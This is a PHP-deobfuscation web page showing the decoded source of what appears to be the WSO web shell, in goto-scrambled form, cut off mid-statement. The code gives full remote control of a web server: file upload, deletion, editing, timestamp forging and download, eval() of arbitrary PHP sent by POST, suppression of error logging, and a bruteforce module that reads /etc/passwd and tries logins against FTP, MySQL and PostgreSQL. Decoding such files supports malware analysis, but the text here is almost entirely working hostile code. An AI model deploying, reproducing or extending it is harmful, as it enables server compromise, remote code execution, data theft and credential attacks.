Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto Cjo7J; LqaMO: $safe_mode = @ini_get("safe_mode"); goto zGahs; zGahs: ..
Decoded Output download
<?php
goto Cjo7J;
LqaMO:
$safe_mode = @ini_get("safe_mode");
goto zGahs;
zGahs:
if (!$safe_mode) {
error_reporting(0);
}
goto Gop14;
j2Rfu:
if (
!empty($_POST["a"]) &&
function_exists("action" . $_POST["a"])
) {
call_user_func("action" . $_POST["a"]);
}
goto Zxful;
GFRHq:
@ini_set("error_log", null);
goto g7ZCc;
N84uU:
function actionFilesMan()
{
goto J7jRR;
la8rp:
if (class_exists("ZipArchive")) {
echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
}
goto GTtN3;
uO4Od:
if (!empty($_POST["p1"])) {
switch ($_POST["p1"]) {
case "uploadFile":
if (
!@move_uploaded_file(
$_FILES["f"]["tmp_name"],
$_FILES["f"]["name"]
)
) {
echo "Can't upload file!";
}
break;
case "mkdir":
if (!@mkdir($_POST["p2"])) {
echo "Can't create new dir";
}
break;
case "delete":
goto zgV_d;
mm32x:
break;
goto hEfbk;
zgV_d:
function deleteDir($path)
{
goto RrCM3;
zxeby:
$dh = opendir($path);
goto TCJ3G;
TCJ3G:
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if (
basename($item) == ".." ||
basename($item) == "."
) {
continue;
}
$type = filetype($item);
if ($type == "dir") {
deleteDir($item);
} else {
@unlink($item);
}
}
goto qhDI4;
SLRoZ:
@rmdir($path);
goto ld2N6;
RrCM3:
$path = substr($path, -1) == "/" ? $path : $path . "/";
goto zxeby;
qhDI4:
closedir($dh);
goto SLRoZ;
ld2N6:
}
goto Jstso;
Jstso:
if (is_array(@$_POST["f"])) {
foreach ($_POST["f"] as $f) {
goto Fce39;
jTf8C:
if (is_dir($f)) {
deleteDir($f);
} else {
@unlink($f);
}
goto sVDIO;
Fce39:
if ($f == "..") {
continue;
}
goto NavX2;
NavX2:
$f = urldecode($f);
goto jTf8C;
sVDIO:
}
}
goto mm32x;
hEfbk:
case "paste":
goto aIzMf;
aIzMf:
if ($_COOKIE["act"] == "copy") {
function copy_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto DXZu5;
OpM7_:
$h = @opendir($c . $s);
goto XF_lF;
XF_lF:
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste(
$c . $s . "/",
$f,
$d . $s . "/"
);
}
}
goto v_Vn9;
DXZu5:
mkdir($d . $s);
goto OpM7_;
v_Vn9:
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["f"] as $f) {
copy_paste(
$_COOKIE["c"],
$f,
$GLOBALS["cwd"]
);
}
} elseif ($_COOKIE["act"] == "move") {
function move_paste($c, $s, $d)
{
if (is_dir($c . $s)) {
goto qKJrU;
TXDEI:
while (($f = @readdir($h)) !== false) {
if ($f != "." and $f != "..") {
copy_paste(
$c . $s . "/",
$f,
$d . $s . "/"
);
}
}
goto xPGvS;
AwOVO:
$h = @opendir($c . $s);
goto TXDEI;
qKJrU:
mkdir($d . $s);
goto AwOVO;
xPGvS:
} elseif (@is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_COOKIE["f"] as $f) {
@rename(
$_COOKIE["c"] . $f,
$GLOBALS["cwd"] . $f
);
}
} elseif ($_COOKIE["act"] == "zip") {
if (
class_exists("ZipArchive")
) {
$zip = new ZipArchive();
if ($zip->open($_POST["p2"], 1)) {
goto Jun5P;
Jun5P:
chdir($_COOKIE["c"]);
goto T_RpN;
MVV2r:
$zip->close();
goto CqwAG;
T_RpN:
foreach ($_COOKIE["f"] as $f) {
if ($f == "..") {
continue;
}
if (@is_file($_COOKIE["c"] . $f)) {
$zip->addFile($_COOKIE["c"] . $f, $f);
} elseif (@is_dir($_COOKIE["c"] . $f)) {
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator(
$f . "/"
)
);
foreach ($iterator as $key => $value) {
$zip->addFile(realpath($key), $key);
}
}
}
goto JhWjt;
JhWjt:
chdir($GLOBALS["cwd"]);
goto MVV2r;
CqwAG:
}
}
} elseif ($_COOKIE["act"] == "unzip") {
if (
class_exists("ZipArchive")
) {
$zip = new ZipArchive();
foreach ($_COOKIE["f"] as $f) {
if ($zip->open($_COOKIE["c"] . $f)) {
$zip->extractTo($GLOBALS["cwd"]);
$zip->close();
}
}
}
} elseif ($_COOKIE["act"] == "tar") {
goto nrwbR;
QmWa1:
chdir($GLOBALS["cwd"]);
goto bK26y;
zHKjB:
wsoEx(
"tar cfzv " .
escapeshellarg($_POST["p2"]) .
" " .
implode(" ", $_COOKIE["f"])
);
goto QmWa1;
BU3zr:
$_COOKIE["f"] = array_map(
"escapeshellarg",
$_COOKIE["f"]
);
goto zHKjB;
nrwbR:
chdir($_COOKIE["c"]);
goto BU3zr;
bK26y:
}
goto tJ8ED;
HwZnR:
setcookie("f", "", time() - 3600);
goto TZk2t;
TZk2t:
break;
goto yoTwQ;
tJ8ED:
unset($_COOKIE["f"]);
goto HwZnR;
yoTwQ:
default:
if (!empty($_POST["p1"])) {
goto TYMaj;
XHEG8:
WSOsetcookie("c", @$_POST["c"]);
goto Unr9o;
TYMaj:
WSOsetcookie("act", $_POST["p1"]);
goto XUMLY;
XUMLY:
WSOsetcookie("f", serialize(@$_POST["f"]));
goto XHEG8;
Unr9o:
}
break;
}
}
goto bpziK;
JbUVa:
usort($files, "wsoCmp");
goto pBUl1;
RjKbq:
function wsoCmp($a, $b)
{
if ($GLOBALS["sort"][0] != "size") {
return strcmp(
strtolower($a[$GLOBALS["sort"][0]]),
strtolower($b[$GLOBALS["sort"][0]])
) * ($GLOBALS["sort"][1] ? 1 : -1);
} else {
return ($a["size"] < $b["size"] ? -1 : 1) *
($GLOBALS["sort"][1] ? 1 : -1);
}
}
goto JbUVa;
flVXx:
$GLOBALS["sort"] = $sort;
goto RjKbq;
b42P7:
echo "</select> ";
goto zga6H;
QsnjB:
$dirContent = wsoScandir(
isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]
);
goto DufhY;
EoM5y:
if (!empty($_POST["p1"])) {
if (
preg_match(
"!s_([A-z]+)_(\d{1})!",
$_POST["p1"],
$match
)
) {
$sort = [$match[1], (int) $match[2]];
}
}
goto uaEIV;
ecDrl:
echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>";
goto QsnjB;
J7jRR:
if (!empty($_COOKIE["f"])) {
$_COOKIE["f"] = @unserialize($_COOKIE["f"]);
}
goto uO4Od;
zqQv8:
foreach ($files as $f) {
echo "<tr" .
($l ? " class=l1" : "") .
"><td><input type=checkbox name="f[]" value="" .
urlencode($f["name"]) .
"" class=chkbx></td><td><a href=# onclick="" .
($f["type"] == "file"
? "g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'view')">" .
htmlspecialchars($f["name"])
: "g('FilesMan','" .
$f["path"] .
"');" " .
(empty($f["link"])
? ""
: "title='{$f["link"]}'") .
"><b>[ " .
htmlspecialchars($f["name"]) .
" ]</b>") .
"</a></td><td>" .
($f["type"] == "file"
? wsoViewSize($f["size"])
: $f["type"]) .
"</td><td>" .
$f["modify"] .
"</td><td>" .
$f["owner"] .
"/" .
$f["group"] .
"</td><td><a href=# onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"','chmod')">" .
$f["perms"] .
"</td><td><a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'rename')">R</a> <a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'touch')">T</a>" .
($f["type"] == "file"
? " <a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'edit')">E</a> <a href="#" onclick="g('FilesTools',null,'" .
urlencode($f["name"]) .
"', 'download')">D</a>"
: "") .
"</td></tr>";
$l = $l ? 0 : 1;
}
goto b9q_L;
ICFmG:
$l = 0;
goto zqQv8;
TSLht:
$n = count($dirContent);
goto p625P;
lC5LC:
$dirs = $files = [];
goto TSLht;
uaEIV:
echo "<script>\xd
function sa() {
for(i=0;i<d.files.elements.length;i++)
\x9 if(d.files.elements[i].type == 'checkbox')\xd\xa \x9 d.files.elements[i].checked = d.files.elements[0].checked;\xd\xa }\xd\xa</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>\xd
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" .
($sort[1] ? 0 : 1) .
"")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" .
($sort[1] ? 0 : 1) .
"")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" .
($sort[1] ? 0 : 1) .
"")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" .
($sort[1] ? 0 : 1) .
"")'>Permissions</a></th><th>Actions</th></tr>";
goto lC5LC;
b9q_L:
echo "<tr><td colspan=7>\xd\xa <input type=hidden name=a value='FilesMan'>\xd\xa\x9<input type=hidden name=c value='" .
htmlspecialchars($GLOBALS["cwd"]) .
"'>
\xa <input type=hidden name=charset value='" .
(isset($_POST["charset"])
? $_POST["charset"]
: "") .
"'>\xd\xa <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
goto la8rp;
MMpaa:
$sort = ["name", 1];
goto EoM5y;
bpziK:
wsoHeader();
goto ecDrl;
GTtN3:
echo "<option value='tar'>Compress (tar.gz)</option>";
goto qCBL1;
zga6H:
if (
!empty($_COOKIE["act"]) &&
@count($_COOKIE["f"]) &&
($_COOKIE["act"] == "zip" ||
$_COOKIE["act"] == "tar")
) {
echo "file name: <input type=text name=p2 value='wso_" .
date("Ymd_His") .
"." .
($_COOKIE["act"] == "zip"
? "zip"
: "tar.gz") .
"'> ";
}
goto T3WX2;
DufhY:
if ($dirContent === false) {
goto KJVLY;
PFKsl:
wsoFooter();
goto ZsRi7;
KJVLY:
echo "Can't open this folder!";
goto PFKsl;
ZsRi7:
return;
goto Uwcm2;
Uwcm2:
}
goto S7vm3;
T3WX2:
echo "<input type='submit' value='>>'></td></tr></form></table></div>";
goto LlrBb;
LlrBb:
wsoFooter();
goto JxN5l;
S7vm3:
global $sort;
goto MMpaa;
pBUl1:
usort($dirs, "wsoCmp");
goto zukJ7;
p625P:
for ($i = 0; $i < $n; $i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = [
"name" => $dirContent[$i],
"path" => $GLOBALS["cwd"] . $dirContent[$i],
"modify" => date(
"Y-m-d H:i:s",
@filemtime($GLOBALS["cwd"] . $dirContent[$i])
),
"perms" => wsoPermsColor(
$GLOBALS["cwd"] . $dirContent[$i]
),
"size" => @filesize(
$GLOBALS["cwd"] . $dirContent[$i]
),
"owner" => $ow["name"]
? $ow["name"]
: @fileowner($dirContent[$i]),
"group" => $gr["name"]
? $gr["name"]
: @filegroup($dirContent[$i]),
];
if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) {
$files[] = array_merge($tmp, [
"type" => "file",
]);
} elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) {
$dirs[] = array_merge($tmp, [
"type" => "link",
"link" => readlink($tmp["path"]),
]);
} elseif (
@is_dir($GLOBALS["cwd"] . $dirContent[$i]) &&
$dirContent[$i] != "."
) {
$dirs[] = array_merge($tmp, ["type" => "dir"]);
}
}
goto flVXx;
qCBL1:
if (!empty($_COOKIE["act"]) && @count($_COOKIE["f"])) {
echo "<option value='paste'>Paste / Compress</option>";
}
goto b42P7;
zukJ7:
$files = array_merge($dirs, $files);
goto ICFmG;
JxN5l:
}
goto KC9ar;
xB4MH:
function actionFilesTools()
{
goto BkWtk;
URhzm:
if (is_file($_POST["p1"])) {
$m = [
"View",
"Highlight",
"Download",
"Hexdump",
"Edit",
"Chmod",
"Rename",
"Touch",
];
} else {
$m = [
"Chmod",
"Rename",
"Touch",
];
}
goto ehyTX;
gIv2Z:
echo "</div>";
goto q1Rl0;
ehyTX:
foreach ($m as $v) {
echo "<a href=# onclick="g(null,null,'" .
urlencode($_POST["p1"]) .
"','" .
strtolower($v) .
"')">" .
(strtolower($v) == @$_POST["p2"]
? "<b>[ " . $v . " ]</b>"
: $v) .
"</a> ";
}
goto OeBNf;
FcH_v:
if (!$uid) {
$uid["name"] = @fileowner($_POST["p1"]);
$gid["name"] = @filegroup($_POST["p1"]);
} else {
$gid = @posix_getgrgid(@filegroup($_POST["p1"]));
}
goto XQqyZ;
tJhrh:
if (@$_POST["p2"] == "mkfile") {
if (!file_exists($_POST["p1"])) {
$fp = @fopen($_POST["p1"], "w");
if ($fp) {
$_POST["p2"] = "edit";
fclose($fp);
}
}
}
goto UpcWr;
hJxBN:
echo "<h1>File tools</h1><div class=content>";
goto LggyK;
jReNS:
if (empty($_POST["p2"])) {
$_POST["p2"] = "view";
}
goto URhzm;
OeBNf:
echo "<br><br>";
goto kfx86;
vLiGd:
echo "<span>Create time:</span> " .
date(
"Y-m-d H:i:s",
filectime($_POST["p1"])
) .
" <span>Access time:</span> " .
date(
"Y-m-d H:i:s",
fileatime($_POST["p1"])
) .
" <span>Modify time:</span> " .
date(
"Y-m-d H:i:s",
filemtime($_POST["p1"])
) .
"<br><br>";
goto jReNS;
LggyK:
if (!file_exists(@$_POST["p1"])) {
goto uyJNU;
C_fb1:
return;
goto fRIHs;
uyJNU:
echo "File not exists";
goto aEu8k;
aEu8k:
wsoFooter();
goto C_fb1;
fRIHs:
}
goto RVSqZ;
BkWtk:
if (isset($_POST["p1"])) {
$_POST["p1"] = urldecode($_POST["p1"]);
}
goto nB0r7;
UpcWr:
wsoHeader();
goto hJxBN;
q1Rl0:
wsoFooter();
goto lZIie;
RVSqZ:
$uid = @posix_getpwuid(@fileowner($_POST["p1"]));
goto FcH_v;
kfx86:
switch ($_POST["p2"]) {
case "view":
goto QAifq;
bn9Hw:
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
goto bbBoN;
bbBoN:
echo "</pre>";
goto K9Wsy;
GqRN7:
$fp = @fopen($_POST["p1"], "r");
goto bn9Hw;
K9Wsy:
break;
goto xBp1j;
QAifq:
echo "<pre class=ml1>";
goto GqRN7;
xBp1j:
case "highlight":
if (@is_readable($_POST["p1"])) {
goto QC8Iq;
XU2TQ:
$code = @highlight_file($_POST["p1"], true);
goto MtAXT;
QC8Iq:
echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">";
goto XU2TQ;
MtAXT:
echo str_replace(
["<span ", "</span>"],
[
"<font ",
"</font>",
],
$code
) . "</div>";
goto nntLP;
nntLP:
}
break;
case "chmod":
goto P8hG1;
LoNwV:
break;
goto AyuC5;
lmil1:
echo "<script>p3_="";</script><form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,this.chmod.value);return false;"><input type=text name=chmod value="" .
substr(sprintf("%o", fileperms($_POST["p1"])), -4) .
""><input type=submit value=">>"></form>";
goto LoNwV;
AAUh2:
clearstatcache();
goto lmil1;
P8hG1:
if (!empty($_POST["p3"])) {
goto dVl9Y;
brcvZ:
for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) {
$perms +=
(int) $_POST["p3"][$i] *
pow(8, strlen($_POST["p3"]) - $i - 1);
}
goto NKCFJ;
NKCFJ:
if (!@chmod($_POST["p1"], $perms)) {
echo "Can't set permissions!<br><script>document.mf.p3.value="";</script>";
}
goto PY3E2;
dVl9Y:
$perms = 0;
goto brcvZ;
PY3E2:
}
goto AAUh2;
AyuC5:
case "edit":
goto H2fMN;
jCDwf:
echo "</textarea><input type=submit value=">>"></form>";
goto Pjp_6;
l2f3k:
echo "<form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>";
goto B2Klk;
YessQ:
if (!empty($_POST["p3"])) {
goto rcwpk;
JCP0G:
$fp = @fopen($_POST["p1"], "w");
goto UIGX9;
UIGX9:
if ($fp) {
goto AyUGu;
ZpECv:
echo "Saved!<br><script>p3_="";</script>";
goto ukKwu;
zJt34:
@fclose($fp);
goto ZpECv;
AyUGu:
@fwrite($fp, $_POST["p3"]);
goto zJt34;
ukKwu:
@touch($_POST["p1"], $time, $time);
goto w_o1Q;
w_o1Q:
}
goto ccEmf;
yLb3a:
$_POST["p3"] = substr($_POST["p3"], 1);
goto JCP0G;
rcwpk:
$time = @filemtime($_POST["p1"]);
goto yLb3a;
ccEmf:
}
goto l2f3k;
H2fMN:
if (!is_writable($_POST["p1"])) {
echo "File isn't writeable";
break;
}
goto YessQ;
B2Klk:
$fp = @fopen($_POST["p1"], "r");
goto of9BR;
of9BR:
if ($fp) {
while (!@feof($fp)) {
echo htmlspecialchars(@fread($fp, 1024));
}
@fclose($fp);
}
goto jCDwf;
Pjp_6:
break;
goto Gznea;
Gznea:
case "hexdump":
goto m3kPv;
AuUGX:
$h = ["00000000<br>", "", ""];
goto GyLAr;
qeOJi:
$n = 0;
goto AuUGX;
jL3k2:
echo "<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>" .
$h[0] .
"</pre></span></td><td bgcolor=#282828><pre>" .
$h[1] .
"</pre></td><td bgcolor=#333333><pre>" .
htmlspecialchars($h[2]) .
"</pre></td></tr></table>";
goto Ufiap;
m3kPv:
$c = @file_get_contents($_POST["p1"]);
goto qeOJi;
Lem2Z:
for ($i = 0; $i < $len; ++$i) {
$h[1] .= sprintf("%02X", ord($c[$i])) . " ";
switch (ord($c[$i])) {
case 0:
$h[2] .= " ";
break;
case 9:
$h[2] .= " ";
break;
case 10:
$h[2] .= " ";
break;
case 13:
$h[2] .= " ";
break;
default:
$h[2] .= $c[$i];
break;
}
$n++;
if ($n == 32) {
goto NPU7A;
NPU7A:
$n = 0;
goto LQkUO;
fObRZ:
$h[1] .= "<br>";
goto fMXko;
LQkUO:
if ($i + 1 < $len) {
$h[0] .=
sprintf("%08X", $i + 1) .
"<br>";
}
goto fObRZ;
fMXko:
$h[2] .= "
";
goto BJu_G;
BJu_G:
}
}
goto jL3k2;
GyLAr:
$len = strlen($c);
goto Lem2Z;
Ufiap:
break;
goto owLSP;
owLSP:
case "rename":
goto DPp_y;
zaQju:
break;
goto Mf7Ir;
DPp_y:
if (!empty($_POST["p3"])) {
if (!@rename($_POST["p1"], $_POST["p3"])) {
echo "Can't rename!<br>";
} else {
die(
"<script>g(null,null,"" .
urlencode($_POST["p3"]) .
"",null,"")</script>"
);
}
}
goto S0xqX;
S0xqX:
echo "<form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,this.name.value);return false;"><input type=text name=name value="" .
htmlspecialchars($_POST["p1"]) .
""><input type=submit value=">>"></form>";
goto zaQju;
Mf7Ir:
case "touch":
goto MdNj9;
fcpc8:
echo "<script>p3_="";</script><form onsubmit="g(null,null,'" .
urlencode($_POST["p1"]) .
"',null,this.touch.value);return false;"><input type=text name=touch value="" .
date(
"Y-m-d H:i:s",
@filemtime($_POST["p1"])
) .
""><input type=submit value=">>"></form>";
goto vSHOq;
vSHOq:
break;
goto RapuR;
GWQpw:
clearstatcache();
goto fcpc8;
MdNj9:
if (!empty($_POST["p3"])) {
$time = strtotime($_POST["p3"]);
if ($time) {
if (!touch($_POST["p1"], $time, $time)) {
echo "Fail!";
} else {
echo "Touched!";
}
} else {
echo "Bad time format!";
}
}
goto GWQpw;
RapuR:
}
goto gIv2Z;
nB0r7:
if (@$_POST["p2"] == "download") {
if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) {
goto kEAXk;
LrqUY:
$fp = @fopen($_POST["p1"], "r");
goto oCCHm;
rpfQA:
if (
function_exists(
"mime_content_type"
)
) {
$type = @mime_content_type($_POST["p1"]);
header(
"Content-Type: " .
$type
);
} else {
header(
"Content-Type: application/octet-stream"
);
}
goto LrqUY;
oCCHm:
if ($fp) {
while (!@feof($fp)) {
echo @fread($fp, 1024);
}
fclose($fp);
}
goto Vqm3n;
PiFXF:
header(
"Content-Disposition: attachment; filename=" .
basename($_POST["p1"])
);
goto rpfQA;
kEAXk:
ob_start("ob_gzhandler", 4096);
goto PiFXF;
Vqm3n:
}
exit();
}
goto tJhrh;
XQqyZ:
echo "<span>Name:</span> " .
htmlspecialchars(@basename($_POST["p1"])) .
" <span>Size:</span> " .
(is_file($_POST["p1"])
? wsoViewSize(filesize($_POST["p1"]))
: "-") .
" <span>Permission:</span> " .
wsoPermsColor($_POST["p1"]) .
" <span>Owner/Group:</span> " .
$uid["name"] .
"/" .
$gid["name"] .
"<br>";
goto vLiGd;
lZIie:
}
goto w2GF1;
etiAC:
function wsoPerms($p)
{
goto kfyb8;
GUcgT:
$i .=
$p & 0x1
? ($p & 0x200
? "t"
: "x")
: ($p & 0x200
? "T"
: "-");
goto mshmE;
kfyb8:
if (($p & 0xc000) == 0xc000) {
$i = "s";
} elseif (($p & 0xa000) == 0xa000) {
$i = "l";
} elseif (($p & 0x8000) == 0x8000) {
$i = "-";
} elseif (($p & 0x6000) == 0x6000) {
$i = "b";
} elseif (($p & 0x4000) == 0x4000) {
$i = "d";
} elseif (($p & 0x2000) == 0x2000) {
$i = "c";
} elseif (($p & 0x1000) == 0x1000) {
$i = "p";
} else {
$i = "u";
}
goto pqnZD;
GuUyD:
$i .= $p & 0x2 ? "w" : "-";
goto GUcgT;
Vg6sO:
$i .= $p & 0x10 ? "w" : "-";
goto vneDY;
I8J2d:
$i .=
$p & 0x40
? ($p & 0x800
? "s"
: "x")
: ($p & 0x800
? "S"
: "-");
goto yfJn7;
pqnZD:
$i .= $p & 0x100 ? "r" : "-";
goto FjLaa;
yfJn7:
$i .= $p & 0x20 ? "r" : "-";
goto Vg6sO;
FjLaa:
$i .= $p & 0x80 ? "w" : "-";
goto I8J2d;
vneDY:
$i .=
$p & 0x8
? ($p & 0x400
? "s"
: "x")
: ($p & 0x400
? "S"
: "-");
goto e6Pjl;
e6Pjl:
$i .= $p & 0x4 ? "r" : "-";
goto GuUyD;
mshmE:
return $i;
goto MofP7;
MofP7:
}
goto eRZM6;
j4eIF:
if (
!isset(
$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
)
) {
$_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
] = (bool) $default_use_ajax;
}
goto EoPoZ;
qZOco:
if (isset($_POST["c"])) {
@chdir($_POST["c"]);
}
goto sO9OV;
tZUOM:
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
$os = "win";
} else {
$os = "nix";
}
goto LqaMO;
B8b3D:
function actionRC()
{
if (!@$_POST["p1"]) {
$a = [
"uname" => php_uname(),
"php_version" => phpversion(),
"wso_version" => WSO_VERSION,
"safemode" => @ini_get(
"safe_mode"
),
];
echo serialize($a);
} else {
eval($_POST["p1"]);
}
}
goto dPSqc;
Gop14:
$disable_functions = @ini_get(
"disable_functions"
);
goto oE6Ue;
oHsYW:
function actionPhp()
{
goto s1VTJ;
ujMFQ:
wsoFooter();
goto dfcYP;
s1VTJ:
if (isset($_POST["ajax"])) {
goto jtGxB;
XiIjv:
eval($_POST["p1"]);
goto pcNS1;
cL7XN:
ob_start();
goto XiIjv;
keRr1:
exit();
goto cNits;
t7wh1:
echo strlen($temp), "
", $temp;
goto keRr1;
pcNS1:
$temp =
"document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" .
addcslashes(
htmlspecialchars(ob_get_clean()),
"\xa
\'\x0"
) .
"';\xa";
goto t7wh1;
jtGxB:
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
true
);
goto cL7XN;
cNits:
}
goto IyHRn;
wcs04:
echo "</pre></div>";
goto ujMFQ;
Sz7n2:
echo "<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a('Php',null,this.code.value);}else{g('Php',null,this.code.value,'');}return false;"><textarea name=code class=bigarea id=PhpCode>" .
(!empty($_POST["p1"])
? htmlspecialchars($_POST["p1"])
: "") .
"</textarea><input type=submit value=Eval style="margin-top:5px">";
goto bE4Om;
t2vRD:
wsoHeader();
goto om2si;
oWPfu:
if (!empty($_POST["p1"])) {
goto uFjl_;
uFjl_:
ob_start();
goto XYFVS;
qDLEK:
echo htmlspecialchars(ob_get_clean());
goto Zre8T;
XYFVS:
eval($_POST["p1"]);
goto qDLEK;
Zre8T:
}
goto wcs04;
IyHRn:
if (empty($_POST["ajax"]) && !empty($_POST["p1"])) {
WSOsetcookie(
md5($_SERVER["HTTP_HOST"]) .
"ajax",
0
);
}
goto t2vRD;
om2si:
if (isset($_POST["p2"]) && $_POST["p2"] == "info") {
goto u6Vem;
u6Vem:
echo "<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>";
goto ClNOj;
ClNOj:
ob_start();
goto Z0UYj;
WpKFt:
$tmp = preg_replace(
[
"!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU",
"!td, th {(.*)}!msiU",
"!<img[^>]+>!msiU",
],
[
"",
".e, .v, .h, .h th {$1}",
"",
],
$tmp
);
goto AiOL8;
Z0UYj:
phpinfo();
goto pDREm;
pDREm:
$tmp = ob_get_clean();
goto WpKFt;
AiOL8:
echo str_replace("<h1", "<h2", $tmp) .
"</div><br>";
goto xiXKW;
xiXKW:
}
goto Sz7n2;
bE4Om:
echo " <input type=checkbox name=ajax value=1 " .
($_COOKIE[
md5($_SERVER["HTTP_HOST"]) .
"ajax"
]
? "checked"
: "") .
"> send using AJAX</form><pre id=PhpOutput style="" .
(empty($_POST["p1"])
? "display:none;"
: "") .
"margin-top:5px;" class=ml1>";
goto oWPfu;
dfcYP:
}
goto N84uU;
jB3VR:
$default_charset = "Windows-1251";
goto fj9OS;
rTVjF:
function actionLogout()
{
setcookie(
md5($_SERVER["HTTP_HOST"]),
"",
time() - 3600
);
die("bye!");
}
goto i6mTz;
DbGtY:
function actionBruteforce()
{
goto uMF9i;
hSv50:
if (isset($_POST["proto"])) {
goto jX4Q5;
UnBlf:
if ($_POST["type"] == 1) {
$temp = @file("/etc/passwd");
if (is_array($temp)) {
foreach ($temp as $line) {
goto vXxXO;
zFefs:
if (@$_POST["reverse"]) {
goto S2jvF;
oahSQ:
for ($i = strlen($line[0]) - 1; $i >= 0; --$i) {
$tmp .= $line[0][$i];
}
goto rxcry;
S2jvF:
$tmp = "";
goto oahSQ;
rxcry:
++$attempts;
goto TfDj5;
TfDj5:
if (
wsoBruteForce(
@$server[0],
@$server[1],
$line[0],
$tmp
)
) {
$success++;
echo "<b>" .
htmlspecialchars($line[0]) .
"</b>:" .
htmlspecialchars($tmp);
}
goto lNTnA;
lNTnA:
}
goto i039d;
b2CQw:
++$attempts;
goto i1_FI;
i1_FI:
if (
wsoBruteForce(
@$server[0],
@$server[1],
$line[0],
$line[0]
)
) {
$success++;
echo "<b>" .
htmlspecialchars($line[0]) .
"</b>:" .
htmlspecialchars($line[0]) .
"<br>";
}
goto zFefs;
vXxXO:
$line = explode(":", $line);
goto b2CQw;
i039d:
}
}
} elseif ($_POST["type"] == 2) {
$temp = @file($_POST["dict"]);
if (is_array($temp)) {
foreach ($temp as $line) {
goto kf0wF;
NI_R6:
if (
wsoBruteForce(
$server[0],
@$server[1],
$_POST["login"],
$line
)
) {
$success++;
echo "<b>" .
htmlspecialchars($_POST["login"]) .
"</b>:" .
htmlspecialchars($line) .
"<br>";
}
goto JCePy;
kf0wF:
$line = trim($line);
goto byC2k;
byC2k:
++$attempts;
goto NI_R6;
JCePy:
}
}
}
goto VERJt;
jX4Q5:
echo "<h1>Results</h1><div class=content><span>Type:</span> " .
htmlspecialchars($_POST["proto"]) .
" <span>Server:</span> " .
htmlspecialchars($_POST["server"]) .
"<br>";
goto LBJl4;
VERJt:
echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>";
goto U2KZG;
ObcWW:
$server = explode(":", $_POST["server"]);
goto UnBlf;
LBJl4:
if ($_POST["proto"] == "ftp") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto w1bnC;
MJhTf:
@ftp_close($fp);
goto efLYK;
efLYK:
return $res;
goto zU7bZ;
aqJAG:
$res = @ftp_login($fp, $login, $pass);
goto MJhTf;
w1bnC:
$fp = @ftp_connect($ip, $port ? $port : 21);
goto NYGOQ;
NYGOQ:
if (!$fp) {
return false;
}
goto aqJAG;
zU7bZ:
}
} elseif ($_POST["proto"] == "mysql") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto nwkI1;
tqKjk:
@mysqli_close($res);
goto lNvU5;
nwkI1:
$res = @mysqli_connect(
$ip . ":" . $port ? $port : 3306,
$login,
$pass
);
goto tqKjk;
lNvU5:
return $res;
goto h_hcl;
h_hcl:
}
} elseif ($_POST["proto"] == "pgsql") {
function wsoBruteForce($ip, $port, $login, $pass)
{
goto ucMyA;
DgnPW:
@pg_close($res);
goto qQMP_;
qQMP_:
return $res;
goto N73qn;
ucMyA:
$str =
"host='" .
$ip .
"' port='" .
$port .
"' user='" .
$login .
"' password='" .
$pass .
"' dbname=postgres";
goto szIUy;
szIUy:
$res = @pg_connect($str);
goto DgnPW;
N73qn:
}
}
goto px18Z;
px18Z:
$success = 0;
goto aKdd5;
aKdd5:
$attempts = 0;
goto ObcWW;
U2KZG:
}
goto NNTq8;
NNTq8:
echo "<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" .
